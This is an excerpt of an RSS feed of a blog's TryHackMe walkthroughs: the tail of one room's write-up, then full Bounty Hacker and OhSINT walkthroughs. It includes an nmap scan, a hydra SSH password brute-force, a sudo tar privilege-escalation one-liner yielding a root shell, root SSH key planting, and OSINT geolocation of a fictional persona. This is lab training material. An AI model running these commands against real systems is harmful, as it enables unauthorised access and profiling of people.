&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbtnfrvpjxrwaig2z6rcc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbtnfrvpjxrwaig2z6rcc.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Aaaand we have root shell! But there is no root flag in the home dir.  &lt;/p&gt;




&lt;h4&gt;
  
  
  Finding the root.txt file
&lt;/h4&gt;

&lt;p&gt;This VNC session is very inconvenient to navigate around. If you remember from earlier, this machine allows root login via SSH. So let's generate some SSH keys to enable private key login. &lt;/p&gt;

&lt;p&gt;Run below commands on remote machine  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;ssh-keygen&lt;/code&gt; to generate keys&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cd /root/.ssh/ &amp;amp;&amp;amp; cat id_rsa.pub &amp;gt; authorized_keys&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Run Python3 webserver and download private key file &lt;code&gt;id_rsa&lt;/code&gt; onto your machine
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;On your local machine(assuming Kali)  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;sudo chown kali:kali id_rsa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sudo chmod 600 id_rsa&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now use this key file to login to the machine using the SSH Service at port 4012.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gbh6sc72m1jhmtkuhnk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gbh6sc72m1jhmtkuhnk.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Executing an &lt;code&gt;ls -laR&lt;/code&gt; in the &lt;code&gt;root&lt;/code&gt; home dir yields the following.&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsm3tfqb5u3h2sh1i8bts.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsm3tfqb5u3h2sh1i8bts.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;So the root flag is in &lt;code&gt;/root/.nothing/r00t.txt&lt;/code&gt;. Note the zeroes in the file name.  &lt;/p&gt;

&lt;p&gt;The contents are as follows:&lt;br&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4acvrl2j9mz1kejvpwn9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4acvrl2j9mz1kejvpwn9.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;We will have to decode it to get the answer. This was obviously not Base64. I initially tried &lt;a href="https://rot13.com/" rel="noopener noreferrer"&gt;https://rot13.com/&lt;/a&gt; but that did not yield anything.  &lt;/p&gt;

&lt;p&gt;This is where &lt;a class="mentioned-user" href="https://dev.to/tan"&gt;@tan&lt;/a&gt; on the THM Discord server gave me a hint about trying to use &lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;GCHQ CyberChef&lt;/a&gt; magic formula to try and guess what kind of encoding this was.  &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt4jufzhovgl2r5csm6s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt4jufzhovgl2r5csm6s.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Aaand done!! Whew what a ride that was. Thanks for reading!  &lt;/p&gt;

&lt;p&gt;Seriously recommend trying the machine yourself =&amp;gt; &lt;a href="https://tryhackme.com/room/superspamr" rel="noopener noreferrer"&gt;https://tryhackme.com/room/superspamr&lt;/a&gt;&lt;/p&gt;

</description>
      <category>infosec</category>
      <category>ctf</category>
      <category>tryhackme</category>
      <category>security</category>
    </item>
    <item>
      <title>TryHackMe Bounty Hacker Room Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Sat, 07 Aug 2021 09:09:34 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-bounty-hacker-room-walkthrough-2aa9</link>
      <guid>https://dev.to/wandering-geek/tryhackme-bounty-hacker-room-walkthrough-2aa9</guid>
      <description>&lt;p&gt;&lt;a href="https://tryhackme.com/room/cowboyhacker"&gt;https://tryhackme.com/room/cowboyhacker&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;1) Enumeration / Service Discovery&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Nmap 7.91 scan initiated Mon Jul 26 08:17:23 2021 as: nmap -p- -A -Pn -oA resultsNmap -vv 10.10.61.20&lt;/span&gt;
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-495795&lt;/span&gt; microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of &lt;span class="nt"&gt;-495795&lt;/span&gt; microseconds.  Ignoring time.
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;10.10.61.20
Host is up, received user-set &lt;span class="o"&gt;(&lt;/span&gt;0.16s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Scanned at 2021-07-26 08:17:24 IST &lt;span class="k"&gt;for &lt;/span&gt;800s
Not shown: 55529 filtered ports, 10003 closed ports
Reason: 55529 no-responses and 10003 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 60 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed &lt;span class="o"&gt;(&lt;/span&gt;FTP code 230&lt;span class="o"&gt;)&lt;/span&gt;
|_Can&lt;span class="s1"&gt;'t get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.9.26
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgcwCtWTBLYfcPeyDkCNmq6mXb/qZExzWud7PuaWL38rUCUpDu6kvqKMLQRHX4H3vmnPE/YMkQIvmz4KUX4H/aXdw0sX5n9jrennTzkKb/zvqWNlT6zvJBWDDwjv5g9d34cMkE9fUlnn2gbczsmaK6Zo337F40ez1iwU0B39e5XOqhC37vJuqfej6c/C4o5FcYgRqktS/kdcbcm7FJ+fHH9xmUkiGIpvcJu+E4ZMtMQm4bFMTJ58bexLszN0rUn17d2K4+lHsITPVnIxdn9hSc3UomDrWWg+hWknWDcGpzXrQj
CajO395PlZ0SBNDdN+B14E0m6lRY9GlyCD9hvwwB
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMCu8L8U5da2RnlmmnGLtYtOy0Km3tMKLqm4dDG+CraYh7kgzgSVNdAjCOSfh3lIq9zdwajW+1q9kbbICVb07ZQ=
|   256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICqmJn+c7Fx6s0k8SCxAJAoJB7pS/RRtWjkaeDftreFw
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn'&lt;/span&gt;t have a title &lt;span class="o"&gt;(&lt;/span&gt;text/html&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;2) Foothold&lt;/p&gt;

&lt;p&gt;Observations&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Port 80 - Apache 2.4.18&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Home page seems to have a big image from the Cowboy Bebop anime. Which seems to be stored in the &lt;code&gt;/images/&lt;/code&gt; dir. Visiting that dir shows that dir listing allowed. Running feroxbuster on the web portal in parallel.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--tSIKEYMX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ccm1qecmrfjp6njxxlp7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--tSIKEYMX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ccm1qecmrfjp6njxxlp7.png" alt="Alt Text" width="800" height="311"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--kECzX978--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z3ffue7qq17elagkyvti.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--kECzX978--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z3ffue7qq17elagkyvti.png" alt="Alt Text" width="637" height="321"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;FTP Anon login allowed. Got two files -&amp;gt; locks.txt and tasks.txt.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ftp 10.10.61.20                                                                  
Connected to 10.10.61.20.                                                                                                                                                  
220 &lt;span class="o"&gt;(&lt;/span&gt;vsFTPd 3.0.3&lt;span class="o"&gt;)&lt;/span&gt;                                                                                                                                                         
Name &lt;span class="o"&gt;(&lt;/span&gt;10.10.61.20:kali&lt;span class="o"&gt;)&lt;/span&gt;: Anonymous                                                                                                                                         
230 Login successful.                                                                
Remote system &lt;span class="nb"&gt;type &lt;/span&gt;is UNIX.                                                          
Using binary mode to transfer files.                                                 
ftp&amp;gt; &lt;span class="nb"&gt;ls                                                                              
&lt;/span&gt;200 PORT &lt;span class="nb"&gt;command &lt;/span&gt;successful. Consider using PASV.                                    
150 Here comes the directory listing.                                                                                                                                      
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt;    1 ftp      ftp           418 Jun 07  2020 locks.txt                    
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt;    1 ftp      ftp            68 Jun 07  2020 task.txt                     
226 Directory send OK.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;tasks.txt&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;Q3: Who wrote the task list?&lt;br&gt;&lt;br&gt;
A3: lin&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;code&gt;locks.txt&lt;/code&gt; seems to contain a what looks like a list of passwords. &lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iyMtrm5o--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vf4yzqa3fvj00ew740k8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iyMtrm5o--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vf4yzqa3fvj00ew740k8.png" alt="Alt Text" width="548" height="660"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's try to bruteforce ssh with the probable password list provided and the username &lt;code&gt;lin&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;hydra &lt;span class="nt"&gt;-l&lt;/span&gt; lin &lt;span class="nt"&gt;-P&lt;/span&gt; locks.txt ssh://10.10.61.20
&lt;span class="o"&gt;[&lt;/span&gt;22][ssh] host: 10.10.61.20   login: lin   password: CENSORED
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Success!&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q4: What service can you bruteforce with the text file found?&lt;br&gt;
A4: SSH &lt;/p&gt;

&lt;p&gt;Q5: What is the users password? &lt;br&gt;
A5: Result of &lt;code&gt;ssh&lt;/code&gt; bruteforce using &lt;code&gt;hydra&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Let's ssh into the machine with this username/password combo. This allows us to get &lt;code&gt;user.txt&lt;/code&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q6: user.txt&lt;br&gt;
A6: Answer in &lt;code&gt;/home/lin/user.txt&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Now we have a proper foothold in the machine.&lt;/p&gt;

&lt;p&gt;3) Privilege Escalation&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;lin@bountyhacker:~/Desktop&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; password &lt;span class="k"&gt;for &lt;/span&gt;lin: 
Matching Defaults entries &lt;span class="k"&gt;for &lt;/span&gt;lin on bountyhacker:
    env_reset, mail_badpass, &lt;span class="nv"&gt;secure_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/usr/local/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/local/bin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/bin&lt;span class="se"&gt;\:&lt;/span&gt;/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/bin&lt;span class="se"&gt;\:&lt;/span&gt;/snap/bin

User lin may run the following commands on bountyhacker:
    &lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; /bin/tar
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So we can run &lt;code&gt;tar&lt;/code&gt; as &lt;code&gt;root&lt;/code&gt; user. Note the absence of &lt;code&gt;NOPASSWD&lt;/code&gt; here. You will still need the lin user`s password to do this. Fortunately we have that.&lt;/p&gt;

&lt;p&gt;Using &lt;a href="https://gtfobins.github.io/gtfobins/tar/"&gt;Tar GTFOBins&lt;/a&gt; for Privilege Escalation&lt;/p&gt;

&lt;p&gt;`&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;lin@bountyhacker:~/Desktop&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo tar &lt;/span&gt;xf /dev/null &lt;span class="nt"&gt;-I&lt;/span&gt; &lt;span class="s1"&gt;'/bin/sh -c "sh &amp;lt;&amp;amp;2 1&amp;gt;&amp;amp;2"'&lt;/span&gt;
&lt;span class="c"&gt;# id&lt;/span&gt;
&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
`&lt;/p&gt;

&lt;p&gt;Use this shell to navigate to &lt;code&gt;/root/&lt;/code&gt; and get the root flag.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q7: root.txt &lt;br&gt;
A7: Answer in &lt;code&gt;/root/root.txt&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Pretty simple box to solve. Thanks for reading! &lt;/p&gt;

&lt;p&gt;Try it at &lt;a href="https://tryhackme.com/room/cowboyhacker"&gt;https://tryhackme.com/room/cowboyhacker&lt;/a&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>infosec</category>
      <category>tryhackme</category>
      <category>ctf</category>
    </item>
    <item>
      <title>TryHackMe OhSINT Room Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Sat, 07 Aug 2021 08:32:18 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-ohsint-room-walkthrough-j32</link>
      <guid>https://dev.to/wandering-geek/tryhackme-ohsint-room-walkthrough-j32</guid>
      <description>&lt;p&gt;&lt;a href="https://tryhackme.com/room/ohsint"&gt;https://tryhackme.com/room/ohsint&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Are you able to use open source intelligence to solve this challenge?&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;First step is download the task files. Task file looks like the standard Windows XP wallpaper&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q1: What is this users avatar of?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;What user? Let's look at the hint.&lt;/p&gt;

&lt;p&gt;Hint says &lt;code&gt;exiftool is your friend. Who is the author of the image? Do they have any social media accounts?&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Hmm ok then. Let's run &lt;code&gt;exiftool&lt;/code&gt; on the file and see if we can find any user info in it.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iVyTrfuV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6sr734tmqsos3pvd0y3u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iVyTrfuV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6sr734tmqsos3pvd0y3u.png" alt="Alt Text" width="800" height="646"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Interesting. Let's use a search engine if we can any social media accounts for this "OWoodflint".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ezt5wwjj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1uvcsihy87hdgnw2s32f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ezt5wwjj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1uvcsihy87hdgnw2s32f.png" alt="Alt Text" width="800" height="393"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Awesome. We have found a Twitter and one of their GitHub repos.&lt;/p&gt;

&lt;p&gt;Twitter -&amp;gt; &lt;a href="https://twitter.com/OWoodflint"&gt;https://twitter.com/OWoodflint&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--rvOS_N1T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rq5j7y0u8zoeklrhk1ul.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--rvOS_N1T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rq5j7y0u8zoeklrhk1ul.png" alt="Alt Text" width="667" height="670"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Github -&amp;gt; &lt;a href="https://github.com/OWoodfl1nt/people_finder"&gt;https://github.com/OWoodfl1nt/people_finder&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--TaAonPRU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/peehy7o5ciicf4u1jj8o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--TaAonPRU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/peehy7o5ciicf4u1jj8o.png" alt="Alt Text" width="800" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Take note of ALL the important stuff you see in the above screenshots. They will come in handy at a later stage.&lt;/p&gt;

&lt;p&gt;So, we can finally answer Q1 about the user's avatar, based on their Twitter profile pic. &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;A1: Cat&lt;/p&gt;

&lt;p&gt;Q2: What city is this person in?&lt;br&gt;
Hint: BSSID + Wigle.net&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Once again, the question on its own does not make any sense to an OSINT noob like me. So had to take a look at the hint.&lt;/p&gt;

&lt;p&gt;If you'll look at the Twitter account screenshot above, the second screenshot does have a BSSID(unique hardware MAC address for that particular wireless router). &lt;/p&gt;

&lt;p&gt;Now, looking at the hint, let's visit &lt;a href="https://wigle.net/"&gt;wigle.net&lt;/a&gt;. It seems to be a website which allows us to search user-contributed data on wireless networks around the world for our BSSID, and then pinpoint its location.&lt;/p&gt;

&lt;p&gt;First, we'll need to register on the website before running a search.&lt;/p&gt;

&lt;p&gt;Zoom out of the map, paste the BSSID in the BSSID search box, and then click on Filter. You will see a small ring around London. Keep zooming in, until you see the SSID name.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--JanM0evh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9nospxnlabcx640e2woo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--JanM0evh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9nospxnlabcx640e2woo.png" alt="Alt Text" width="800" height="378"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--EmGaOqVS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fo9qw7k9p2tzliy1a16t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--EmGaOqVS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fo9qw7k9p2tzliy1a16t.png" alt="Alt Text" width="800" height="381"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, now we can answer&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q2: What city is this person in?&lt;br&gt;
A2: London&lt;/p&gt;

&lt;p&gt;Q3: Whats the SSID of the WAP he connected to?&lt;br&gt;
A3: UnileverWiFi&lt;/p&gt;

&lt;p&gt;Q4: What is his personal email address?&lt;br&gt;
A4: &lt;a href="mailto:OWoodflint@gmail.com"&gt;OWoodflint@gmail.com&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Answer for Q4 found earlier in the README of their Github repo&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q5: What site did you find his email address on?&lt;br&gt;
A5: GitHub&lt;/p&gt;

&lt;p&gt;Q6: Where has he gone on holiday?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Now, this was truly confusing. After running a couple more searches, finally found a link that appears to be their blog.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iUazehuJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v8rzcbv6fog7nmvmty1x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iUazehuJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v8rzcbv6fog7nmvmty1x.png" alt="Alt Text" width="633" height="340"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Link to Blog =&amp;gt; &lt;a href="https://oliverwoodflint.wordpress.com/author/owoodflint/"&gt;https://oliverwoodflint.wordpress.com/author/owoodflint/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Post content says "Im in New York right now, so I will update this site right away with new photos!". So probably on a vacation. &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q6: Where has he gone on holiday?&lt;br&gt;
A6: New York ( Found on his blog )&lt;/p&gt;

&lt;p&gt;Q7: What is this persons password?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Frankly I had no idea, until I went to that blog post again, and saw that weird string at the end of the blog post.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Q7: What is this persons password?&lt;br&gt;
A7: pennYDr0pper.!&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Thanks for reading. This was a fun goose chase, and a great introduction to OSINT.&lt;/p&gt;

&lt;p&gt;Try the room at &lt;a href="https://tryhackme.com/room/ohsint"&gt;https://tryhackme.com/room/ohsint&lt;/a&gt;&lt;/p&gt;

</description>
      <category>infosec</category>
      <category>ctf</category>
      <category>beginners</category>
      <category>osint</category>
    </item>
    <item>
      <title>TryHackMe CMSpit Room Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Thu, 05 Aug 2021 16:49:40 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-cmspit-room-walkthrough-3fae</link>
      <guid>https://dev.to/wandering-geek/tryhackme-cmspit-room-walkthrough-3fae</guid>
